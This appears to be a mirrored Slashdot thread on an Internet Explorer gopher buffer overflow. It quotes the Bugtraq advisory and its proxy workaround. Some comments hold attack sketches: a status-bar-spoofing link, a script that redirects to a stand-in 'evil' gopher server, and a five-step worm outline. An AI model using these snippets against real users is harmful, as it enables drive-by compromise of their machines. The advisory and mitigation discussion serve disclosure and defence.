Slashdot Mirror
Latest IE Hole Lets Gopher Root You
rvaniwaa writes "Another hole in internet explorer has been discovered. This hole allows a hacker to root a user's computer whenever the user clicks on a gopher link. All versions of IE are affected and a Microsoft spokesman stated that the company is "moving forward on the investigation with all due speed""
Let the "gopher hole" jokes begin.
"hostile Gopher site"? Ouch ... I think shall wear kevlar underpants while using IE in future.
From the article:
In January, Microsoft Chairman Bill Gates instructed employees to make software security a top priority.
Yeah, looks like everythings moving full steam ahead on that front.
----
One of us needs to stick ones' head in a bucket of ice water.
- Hobbes
"Where do you want to gopher today?"
"I smell varmint poontang, and the only good varmint poontang is dead varmint poontang, I think."
I agree that there may not be many gopher links that look like gopher links, but what stops the malicious from disquising their gopher links to look like regular hrefs?
Well you can't expect Microsoft to keep up with all these new technologies and formats!
--
Don't sweat the petty things, and don't pet the sweaty things.
To protect from potential exploiting, you can temporarily disable the gopher
protocol like this:
Go to Tools -> Internet options -> Connections. Click on "LAN settings".
Check "Use a proxy server for your LAN". Click on "Advanced...".
Go to the Gopher text field
and enter "localhost", and "1" in the port field. This will stop Internet
Explorer from showing and processing any gopher pages.
this will protect you for now, at least until M$ pull their finger out
Has anyone ever tried to compile stats on security holes in browsers? What I'd like to see is a comparison of browsers in this case, with each version listed with the various vulnerabilities found? Obviously, IE is going to come out on top here, but I'd be interested to see such a list anyway. I've looked around the SANS site and didn't see anything like that. I'd even settle for a short summary. Something like IE has X amount of holes, Netscape has Y amount of holes, Opera has Z amount, and so on.
Life is hard, and the world is cruel
Funny you should mention a resurgence. I just found this manifesto of people wanting to revive gopher.e sto
http://www.scn.org/~bkarger/gopher-manif
I've got a mind like a steel trap - it's got an animal's foot stuck in it.
That really isn't the point. It would not take many minutes to put up a gopher server with a Win 32 rootkit as content, and then put an innocent but interesting looking link into a web page ('free live world cup scores' would do nicely just now) with an href pointing to that server, and, ideally, one of those annoying JavaScript scrollers in the browser status display to prevent the user from noticing they're about to click a gopher link, and, hey! That's a few more suckers rooted. It will probably go through most firewalls, too.
If you (or your organisation) still use Internet Explorer, I would treat this as serious. Change your default IE install to have gopher point to a safe machine of your own; block gopher at your firewall; and, ideally, switch to Opera 6, Netscape 6, or Mozilla as your organisation's default browser.
This isn't going to be the last security hole found in IE.
I'm old enough to remember when discussions on Slashdot were well informed.
The Official Bugtraq Post:
. asp
OVERVIEW
========
Gopher is a protocol developed at the University of Minnesota in the
early 1990's. Gopher servers offer hierarchically organized directories
and files. These form a "gopherspace" which can be thought of as the
predecessor of the World Wide Web. Gopher was mostly abandoned soon after
HTTP and the World Wide Web started gaining popularity.
Microsoft Internet Explorer has a built-in gopher client. Gopher pages can
be accessed via URLs starting with "gopher://". The part of code in IE
which parses gopher replies contains an exploitable buffer overflow
bug. A malicious server may be used to run arbitrary code on an IE user's
system.
DETAILS
=======
When the overflow is triggered, a fixed sized buffer in stack gets
overwritten with data from the gopher server. This data can contain most
octets from 0 to 255 (also nulls) which makes it particularly easy to
inject a working shellcode in it. This is a traditional, trivially
exploitable buffer overflow. A test exploit has been successfully used to
run arbitrary code without user intervention with various IE versions and
systems including IE 5.5 and 6.0.
The attack can be launched via a web page or an HTML mail message which
redirect the user to a malicious gopher server when the victim views them.
The server can be very minimal, ie. a program that can listen on a TCP
port and write a block of data; a fully operational gopher server isn't
necessary in order to carry out the attack.
The exploiter could do anything that a regular user could do on the
system: retrieve, install, or remove files, upload and run programs, etc.
Full technical details aren't disclosed at this time to prevent
exploitation.
WORKAROUND
==========
Internet Explorer users can protect themselves from the flaw by disabling
the gopher protocol. Barely any gopher servers exist on the Internet
today, so this is unlikely to cause problems. If needed, a gopher client
or some other web browser can be used to access the gopherspace.
An easy way to disable processing and displaying gopher pages is to define
a non-functional gopher proxy in Internet Options. Select Tools ->
Internet options -> Connections. Click on "LAN settings". Check "Use a
proxy server for your LAN". Click on "Advanced...". Here you can define
proxy servers to be used with different protocols. Go to the Gopher text
field and enter "localhost", and "1" in the port text field. This will
stop Internet Explorer from fetching any gopher documents.
After installing the patch from Microsoft you can remove these gopher
proxy settings (or restore them to values they had before).
For more information and a vulnerability test see
http://www.solutions.fi
VENDOR STATUS
=============
Microsoft was contacted on May 20th. At the moment of writing this
advisory, Microsoft has started designing and coding a fix, but hasn't
given any approximation of when it would be released. The patch will be
available at
http://www.microsoft.com/technet/security/current
when it is completed.
I'll have something intelligent to add one of these days...
However, a quicky search turns up several still-active gophers, for example:
gopher://gopher.umsl.edu/
gopher://gopher.cac.psu.edu/
(These actually return data -- some others I found the server up but no data returned).
As to why gopher died out, Tim Berners-Lee offers the following:
(from his book, Weaving the Web)
-- Alastair
Obligitory reference to story posted earlier today...
'Think Tank' Issues Microsoft-Funded Troll
According to this ZDNet article, a Washington think tank known as the Alexis de Tocqueville Institution is soon to release a study stating that Open Source Software allows terrorists an easy time hacking into our systems. It's little suprise that this group takes money from Microsoft." The Register's story is good too. All the whoring reports in the world won't make open source any less secure.
Everybody knows terrorists love to target Mozilla users by sending them links which causes there system to email Star Office attachments to everybody with payloads that will delete all your OGGs and PNGs by exploiting security holes in Sendmail.
"Communism is like having one [local] phone company " - Lenny Bruce
thats not the point -
if you make a link to a gopher site in an html page, the average MS surfer will not hesitate to click on it.
which is what the web was supposed to do, make it transparent.
... hi bingo
nothing... a simple redirect page can force the gopher link to be opened without the user even being asked to click anything. Not to mention javascript. Anything that allows all those pop-up and pop-under ads can just as easily open a gopher link.
https://www.gnu.org/philosophy/free-sw.html
certainly more applicable to the concept of fixing security holes in Microsoft software.
FYI: Whack-a-Mole is an old arcade game where you hold a padded mallet facing a slightly inclined surface with a half-dozen or so holes. Periodically a little mole pops up from a hole, and you try to whack him before he goes back down on his own. A little bit like playing XBill, only in the Real World.
The living have better things to do than to continue hating the dead.
Exactly.. it wouldn't take long for a page that says Download the UT 2003 demo to nuke a bunch of computers. (Where's the demo anyway, dammit, I'm dying to play!)
As I pointed out yesterday, there's more info about the bug and it's prevention available from Oy Solutions, who found the exploit.
Why does a user need to click on the link? Why not just use a javascript location.href= or whatever to automatically load the link? It's my understanding that Yahoo Profiles still lets you embed javascript in a picture URL. What's to stop someone from creating an automated attack and then getting chatters to check your profile? The possibilites seem endless.
A Microsoft spokesman who refused to be identified said Tuesday that the company is "moving forward on the investigation with all due speed" and will take the action that best serves its customers.
Since when did M$ start offering downloads of Mozilla?
I stole this Sig
<a href="gopher://hostile-link" on mouseover status.text="http://www.friendlysite.com" return true>click here!</a>
Now my javascript is rusty and I have not tried this ... but you get the idea.
first of all, its an URL buffer overflow, a gopher link isnt needed.
al thats needed is for someone to disguise an "evil" link, and whammo - you've got r00t.
big big big remote exploit.
... hi bingo
Thats what sucks about windows, you can't say that you rooted some one. Saying "I AMINISTRATORED YOU!" just doesnt sound cool.
Hacker Media
Microsoft: Now with more exploited holes than a two-dollar hooker.
--
I Hit the Karma Cap, and All I Got Was This Lousy
I wish it was that simple. There are hordes of people out there who have jobs where if they install anything on their work computer they will get in trouble.
I am one of these people. I have no choice but to use MSIE and Outlook on NT at work.
I feel so dirty.
And thus the previous comments about blocking gopher are important to many.
And just why should we trust anything this guy says? Their official spokesman won't even stand by what he's saying. And what is he saying, anyway?
So again, as far as Microsoft is concerned, it's the fault of the people who publicized it. It's prudent to assume these guys are not the only ones who know about the problem. Which means my information is already at risk.
So if there are people out there who can compromise my system, why shouldn't I be able to find out about it and take preventive measures? Why should I have to wait until Microsoft -- who haven't even admitted to the vulnerability yet, two weeks after being told about it -- get around to fixing it?
Nope, no sig
gopher://gopher.URr00t3d.ru
"I don't know half of you half as well as I should like, and I like less than half of you half as well as you deserve."
Just because nobody uses something legitimately, it doesn't mean that nobody will use it maliciously.
The best thing about Windows?
It forced me to learn to spell 'administrator.'
Kinda like how FTP forced me to learn to spell 'anonymous.'
Or somthing.
Moneyed corporations, non-working 'poor' and criminal prisoners are turning productive citizens into tax-slaves.
$5 / month hosted VPS on linux = awesome!
...why do they have to find and fix them one by one? Can't they switch to a programming language, or debugging tool, or run-time library, that would find and fix all of them?
Indeed, about the time Windows 2000 was released with 65536 known bugs (or whatever the exact number was), didn't Jim Allchin say that they had such a tool and were using it?
Should buffer overflows be as outdated as Gopher itself?
"How to Do Nothing," kids activities, back in print!
most imporatant of these that gopher is absolutly archaic.
v il.gopherser ver.com:7000/buffer_overflow/");
:-)
<script>
document.location.replace("gopher://e
</script>
Second, as always, Microsoft will have a patch out fairly quickly, which is more that can be said for mozilla half of the time...
I'm amazed at how you split one security hole (XMLHTTPRequest) in two to make a "half the time"...
Incidentally, the patch for XMLHTTPRequest was in nightly builds within 48 hours of the bug report, and in the next milestone within about a week. In contrast, there are currently 17 unpatched holes in IE. What was that you were saying about "quickly"?
Gerv
Perhaps so, but avoiding buffer overflows isn't rocket science. It's a simple matter of bounds checking. There's really no excuse.
I don't care if it's 90,000 hectares. That lake was not my doing.
Everyone keeps saying "but there are like three gopher servers left out there". This is not the point. Any buffer overflow in the IE client code which is exploitable is a huge problem. It doesn't matter that there are damned few servers left that use the exploitable protocol. A malacious server need not even be a fully functioning gopher server, it just needs to listen for requests on the right port and respond appropriately. A worm'ed IIS server could fit the bill quite nicely.
A smart worm could:
1. Infect an IIS server via some unfixed hole, or backdoor left by another worm.
2. Open up a dummy gopher port which responds to all requests with the exploit.
3. Replace links on the web site the IIS server serves with links to the gopher server exploit.
4. The worm installs itself on all client machines that click the gopher links and begins scanning for vunerable servers.
5. Goto 1.
None of this has anything to do with the number gopher servers left on the Internet.
-josh
What's worse? Saying "Don't use IE!" as a blatant attempt at karma whoring, or that some idiot moderators modded that up.
Logic check: "Don't use the browser that most websites are designed for!"
Do you really think I'd be using IE right now if Opera was cutting it?
"Derp de derp."
I found it humorous that in the "Special Offers" Box there was a ad/link that read: "Access Your PC from Anywhere - Free Download"
The problem is that with only 32-bit addressing it's impossible to programatically store all of the bugs in Microsoft's software.
The global economy is a great thing until you feel it locally.
They don't care.
Yeah, they made some PR stunts concerning security, but until stuff like this starts affecting their bottom line, they won't care.
There are just too many morons out there buying their stuff, so the situation won't change anytime soon.
And don't give me that crap about being forced into using it. Noone is going to hold a gun against your head and say: use explorer or die.
If your employer makes you use stuff you hate, then you're just a lame pushover and you deserve what you get.
Click here to download it.
my other penis is a vagina
You mean you haven't found it yet? It's right here!
karma capped
You also missed step 2.9, where the hapless sysadmin spends 3 days trying to figure out Microsoft's patch dependency tree, which is not published. And even M$ admits that they use different, and incompatible, patch mechanisms for different product lines. So if I pull out the install disk to add an additional function to Visio, do I have to reinstall Office XP patches? Why or why not?
sPh
Considering that the browser components are supposedly scattered through many DLLs, any patches from M$ could easily include updates for Digital Rights Management lockdown, spyware to tell tales, etc, as well as the 'next big hole' that someone will 'discover' whenever MS feels the need to send out more tracking/spying/crippling patches.
Heck, they don't even need to include such stuff, just track who downloads the latest patch and correlate with previous data to build a picture of what's out there.
For example, say ten million distinct folks download the latest patch for Win98. If M$ *know* they've only sold eight million copies of Win98, they know there are 2 million BSA targets out there...